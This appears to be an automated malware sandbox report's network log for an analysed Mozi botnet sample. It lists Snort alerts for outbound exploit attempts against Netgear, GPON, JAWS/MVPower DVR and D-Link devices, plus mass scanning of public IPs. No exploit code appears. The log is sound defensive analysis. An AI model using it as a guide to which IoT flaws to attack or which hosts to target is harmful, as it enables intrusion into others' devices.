                          Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:40214 -> 38.86.17.103:80
                          Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:40214 -> 38.86.17.103:80
                          Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 152.89.62.52:30301 -> 192.168.2.23:4000
                          Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.99.193.239:8000 -> 192.168.2.23:4000
                          Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 174.84.184.69:11211 -> 192.168.2.23:4000
                          Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 109.164.113.203:5060 -> 192.168.2.23:4000
                          Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:41594 -> 173.223.178.190:80
                          Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:41594 -> 173.223.178.190:80
                          Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 173.223.178.190:80 -> 192.168.2.23:41594
                          Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:41494 -> 63.33.145.170:80
                          Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:41494 -> 63.33.145.170:80
                          Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 61.3.148.76:18606 -> 192.168.2.23:4000
                          Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.93.89:1900 -> 192.168.2.23:4000
                          Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46626 -> 162.209.132.128:80
                          Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46626 -> 162.209.132.128:80
                          Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34362 -> 148.229.1.12:80
                          Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60110 -> 205.198.160.107:80
                          Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60110 -> 205.198.160.107:80
                          Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:49554 -> 45.131.208.158:80
                          Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:49554 -> 45.131.208.158:80
                          Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45688 -> 104.25.119.143:80
                          Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46790 -> 171.25.175.236:80
                          Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45688 -> 104.25.119.143:80
                          Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46790 -> 171.25.175.236:80
                          Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33654 -> 13.35.5.125:80
                          Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39960 -> 23.58.36.209:80
                          Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33654 -> 13.35.5.125:80
                          Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52420 -> 54.173.33.241:80
                          Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52420 -> 54.173.33.241:80
                          Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39960 -> 23.58.36.209:80
                          Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.58.36.209:80 -> 192.168.2.23:39960
                          Source: TrafficSnort IDS: 2025884 ET EXPLOIT Multiple CCTV-DVR Vendors RCE 192.168.2.23:35686 -> 67.87.4.136:81
                          Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:36530 -> 185.115.61.29:8080
                          Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:36530 -> 185.115.61.29:8080
                          Source: TrafficSnort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:37138 -> 209.126.16.48:80
                          Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:37138 -> 209.126.16.48:80
                          Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:37138 -> 209.126.16.48:80
                          Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:33922 -> 83.240.213.6:80
                          Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:33922 -> 83.240.213.6:80
                          Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33508 -> 23.6.123.60:80
                          Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33508 -> 23.6.123.60:80
                          Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.6.123.60:80 -> 192.168.2.23:33508
                          Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:36280 -> 1.9.218.126:80
                          Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44592 -> 154.209.180.104:80
                          Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44592 -> 154.209.180.104:80
                          Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:60432 -> 154.215.209.203:80
                          Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:60432 -> 154.215.209.203:80
                          Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33924 -> 188.215.82.71:80
                          Source: TrafficSnort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:41576 -> 212.57.43.71:80
                          Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:41576 -> 212.57.43.71:80
                          Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:41576 -> 212.57.43.71:80
                          Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33924 -> 188.215.82.71:80
                          Source: TrafficSnort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:41190 -> 104.24.158.33:8080
                          Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:41190 -> 104.24.158.33:8080
                          Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:41190 -> 104.24.158.33:8080
                          Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:46150 -> 130.107.153.243:80
                          Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:46150 -> 130.107.153.243:80
                          Source: TrafficSnort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:43756 -> 154.208.73.98:80
                          Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:43756 -> 154.208.73.98:80
                          Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:43756 -> 154.208.73.98:80
                          Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50894 -> 178.32.54.199:80
                          Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50894 -> 178.32.54.199:80
                          Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35956 -> 23.44.16.109:80
                          Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35956 -> 23.44.16.109:80
                          Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.44.16.109:80 -> 192.168.2.23:35956
                          Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:45318 -> 198.50.31.71:80
                          Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:45318 -> 198.50.31.71:80
                          Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:57410 -> 23.201.48.195:80
                          Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:57410 -> 23.201.48.195:80
                          Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.201.48.195:80 -> 192.168.2.23:57410
                          Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38758 -> 114.142.213.80:80
                          Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38758 -> 114.142.213.80:80
                          Source: TrafficSnort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:50994 -> 85.159.236.201:80
                          Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:50994 -> 85.159.236.201:80
                          Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:50994 -> 85.159.236.201:80
                          Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:49740 -> 3.66.12.202:80
                          Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:49740 -> 3.66.12.202:80
                          Source: TrafficSnort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:47786 -> 196.46.192.172:80
                          Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:47786 -> 196.46.192.172:80
                          Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:47786 -> 196.46.192.172:80
                          Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:46580 -> 34.102.251.67:8080
                          Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:46580 -> 34.102.251.67:8080
                          Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58084 -> 87.17.124.195:80
                          Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58084 -> 87.17.124.195:80
                          Source: TrafficSnort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:41712 -> 52.177.218.245:80
                          Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:41712 -> 52.177.218.245:80
                          Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:41712 -> 52.177.218.245:80
                          Source: TrafficSnort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:59316 -> 60.254.146.28:80
                          Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:59316 -> 60.254.146.28:80
                          Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:59316 -> 60.254.146.28:80
                          Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 60.254.146.28:80 -> 192.168.2.23:59316
                          Source: TrafficSnort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:46538 -> 192.126.238.185:80
                          Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:46538 -> 192.126.238.185:80
                          Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:46538 -> 192.126.238.185:80
                          Source: TrafficSnort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:41830 -> 174.136.32.221:80
                          Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:41830 -> 174.136.32.221:80
                          Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:41830 -> 174.136.32.221:80
                          Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:51146 -> 95.171.44.71:80
                          Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:51146 -> 95.171.44.71:80
                          Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:60330 -> 37.28.170.140:80
                          Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:60330 -> 37.28.170.140:80
                          Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:55812 -> 93.41.229.147:80
                          Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:54054 -> 23.57.42.173:80
                          Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:55982 -> 23.1.122.127:80
                          Source: global trafficTCP traffic: 49.30.95.191 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 46.208.194.138 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 186.13.189.220 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 115.128.48.99 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 87.59.59.83 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 40.217.232.105 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 1.102.177.191 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 145.78.150.14 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 182.70.170.130 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 194.204.98.109 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 147.242.54.19 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 92.66.154.32 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 165.213.73.162 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 60.91.131.86 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 97.132.168.27 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 81.78.52.168 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 152.225.18.120 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 183.56.193.84 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 170.248.33.117 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 119.44.231.19 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 34.235.160.60 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 112.176.104.27 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 27.49.23.52 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 105.242.110.44 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 93.51.81.184 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 119.236.192.141 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 166.236.5.250 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 120.234.0.119 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 145.20.161.88 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 45.60.67.75 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 182.6.67.113 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 120.184.29.196 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 83.120.45.138 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 71.10.2.3 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 186.74.80.35 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 6.42.96.227 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 131.239.170.174 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 130.30.19.29 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 124.242.109.222 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 60.39.118.49 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 154.227.186.158 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 41.1.30.61 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 122.36.114.106 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 150.179.62.203 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 33.162.5.64 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 79.115.136.43 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 221.126.105.14 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 188.90.174.120 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 219.17.67.235 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 34.69.23.176 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 8.96.114.127 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 118.24.78.63 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 105.188.53.103 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 88.103.118.246 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 8.33.31.17 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 189.232.159.133 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 83.41.162.42 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 79.161.24.176 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 143.54.177.24 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 4.178.77.136 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 154.2.250.169 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 197.43.185.122 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 168.21.138.88 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 156.225.166.184 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 1.224.209.95 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 30.101.205.242 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 119.163.0.210 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 83.199.233.176 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 159.42.57.237 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 60.138.201.97 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 120.185.75.38 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 211.183.25.135 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 133.193.211.115 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 210.162.131.189 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 33.38.63.31 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 179.28.189.224 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 198.195.107.231 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 103.133.112.54 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 29.146.1.94 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 216.93.120.15 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 58.170.123.16 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 17.229.113.84 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 9.219.58.246 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 67.56.126.36 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 11.216.21.192 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 13.156.98.231 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 152.79.242.212 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 175.195.226.130 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 54.122.133.187 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 197.34.33.4 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 138.81.221.137 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 81.79.57.93 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 152.90.219.150 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 13.59.26.118 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 133.165.216.47 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 130.102.160.74 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 104.86.216.214 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 166.31.23.109 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 179.220.108.237 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 122.120.11.163 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 25.87.237.51 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 5.30.108.246 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 47.57.146.158 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 55.226.166.165 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 39.152.6.71 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 139.235.155.108 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 141.147.122.73 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 137.242.74.67 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 154.192.176.198 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 54.1.124.25 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 219.44.149.12 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 169.240.44.151 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 166.92.12.100 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 128.218.150.32 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 123.55.16.248 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 25.224.91.27 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 200.115.122.89 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 24.1.57.126 ports 2,5,6,8,9,52869
                          Source: global trafficTCP traffic: 11.174.186.112 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 90.198.227.113 ports 1,2,4,5,9,49152
                          Source: global trafficTCP traffic: 21.235.94.156 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 17.202.225.253 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 65.53.76.53 ports 1,2,3,5,7,37215
                          Source: global trafficTCP traffic: 122.42.97.57 ports 1,2,4,5,9,49152
                          Source: unknownNetwork traffic detected: HTTP traffic on port 32814 -> 8443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 45178 -> 37215
                          Source: unknownNetwork traffic detected: HTTP traffic on port 45178 -> 37215
                          Source: unknownNetwork traffic detected: HTTP traffic on port 45178 -> 37215
                          Source: unknownNetwork traffic detected: HTTP traffic on port 45178 -> 37215
                          Source: unknownNetwork traffic detected: HTTP traffic on port 45178 -> 37215
                          Source: unknownNetwork traffic detected: HTTP traffic on port 45178 -> 37215
                          Source: unknownNetwork traffic detected: HTTP traffic on port 45178 -> 37215
                          Source: unknownNetwork traffic detected: HTTP traffic on port 35686 -> 81
                          Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 35686
                          Source: unknownNetwork traffic detected: HTTP traffic on port 59450 -> 81
                          Source: unknownNetwork traffic detected: HTTP traffic on port 59450 -> 81
                          Source: unknownNetwork traffic detected: HTTP traffic on port 59450 -> 81
                          Source: unknownNetwork traffic detected: HTTP traffic on port 59450 -> 81
                          Source: unknownNetwork traffic detected: HTTP traffic on port 59450 -> 81
                          Source: unknownNetwork traffic detected: HTTP traffic on port 59450 -> 81
                          Source: unknownNetwork traffic detected: HTTP traffic on port 59450 -> 81
                          Source: unknownNetwork traffic detected: HTTP traffic on port 59450 -> 81
                          Source: global trafficTCP traffic: 192.168.2.23:44492 -> 113.200.105.232:8443
                          Source: global trafficTCP traffic: 192.168.2.23:41188 -> 67.129.160.73:5555
                          Source: global trafficTCP traffic: 192.168.2.23:56336 -> 184.11.167.170:8443
                          Source: global trafficTCP traffic: 192.168.2.23:36632 -> 109.102.232.127:5555
                          Source: global trafficTCP traffic: 192.168.2.23:40794 -> 166.31.23.109:37215
                          Source: global trafficTCP traffic: 192.168.2.23:50012 -> 35.45.112.6:8443
                          Source: global trafficTCP traffic: 192.168.2.23:59028 -> 22.144.232.185:8080
                          Source: global trafficTCP traffic: 192.168.2.23:41930 -> 100.196.47.140:8080
                          Source: global trafficTCP traffic: 192.168.2.23:38968 -> 55.245.84.60:8080
                          Source: global trafficTCP traffic: 192.168.2.23:53970 -> 200.186.246.157:7574
                          Source: global trafficTCP traffic: 192.168.2.23:50484 -> 102.5.129.5:7574
                          Source: global trafficTCP traffic: 192.168.2.23:57494 -> 137.64.79.56:81
                          Source: global trafficTCP traffic: 192.168.2.23:41572 -> 185.119.191.5:8443
                          Source: global trafficTCP traffic: 192.168.2.23:34966 -> 21.235.94.156:37215
                          Source: global trafficTCP traffic: 192.168.2.23:53738 -> 65.53.76.53:37215
                          Source: global trafficTCP traffic: 192.168.2.23:38138 -> 171.179.128.100:7574
                          Source: global trafficTCP traffic: 192.168.2.23:45068 -> 45.25.57.240:8080
                          Source: global trafficTCP traffic: 192.168.2.23:48750 -> 218.50.181.147:8080
                          Source: global trafficTCP traffic: 192.168.2.23:46710 -> 126.28.245.2:8080
                          Source: global trafficTCP traffic: 192.168.2.23:42706 -> 40.107.51.226:8443
                          Source: global trafficTCP traffic: 192.168.2.23:34180 -> 126.36.55.25:8080
                          Source: global trafficTCP traffic: 192.168.2.23:39988 -> 90.228.187.181:7574
                          Source: global trafficTCP traffic: 192.168.2.23:38076 -> 188.126.206.174:8080
                          Source: global trafficTCP traffic: 192.168.2.23:47250 -> 35.183.126.209:7574
                          Source: global trafficTCP traffic: 192.168.2.23:53236 -> 125.19.179.159:8080
                          Source: global trafficTCP traffic: 192.168.2.23:52226 -> 187.0.181.7:8443
                          Source: global trafficTCP traffic: 192.168.2.23:55502 -> 198.194.3.135:8443
                          Source: global trafficTCP traffic: 192.168.2.23:41642 -> 180.254.127.131:81
                          Source: global trafficTCP traffic: 192.168.2.23:54332 -> 179.194.207.199:8443
                          Source: global trafficTCP traffic: 192.168.2.23:53330 -> 105.25.244.131:8080
                          Source: global trafficTCP traffic: 192.168.2.23:60190 -> 91.8.221.112:5555
                          Source: global trafficTCP traffic: 192.168.2.23:48354 -> 118.24.78.63:52869
                          Source: global trafficTCP traffic: 192.168.2.23:41650 -> 182.6.67.113:52869
                          Source: global trafficTCP traffic: 192.168.2.23:37162 -> 154.2.250.169:52869
                          Source: global trafficTCP traffic: 192.168.2.23:39162 -> 93.65.82.228:8080
                          Source: global trafficTCP traffic: 192.168.2.23:57378 -> 31.215.135.3:8080
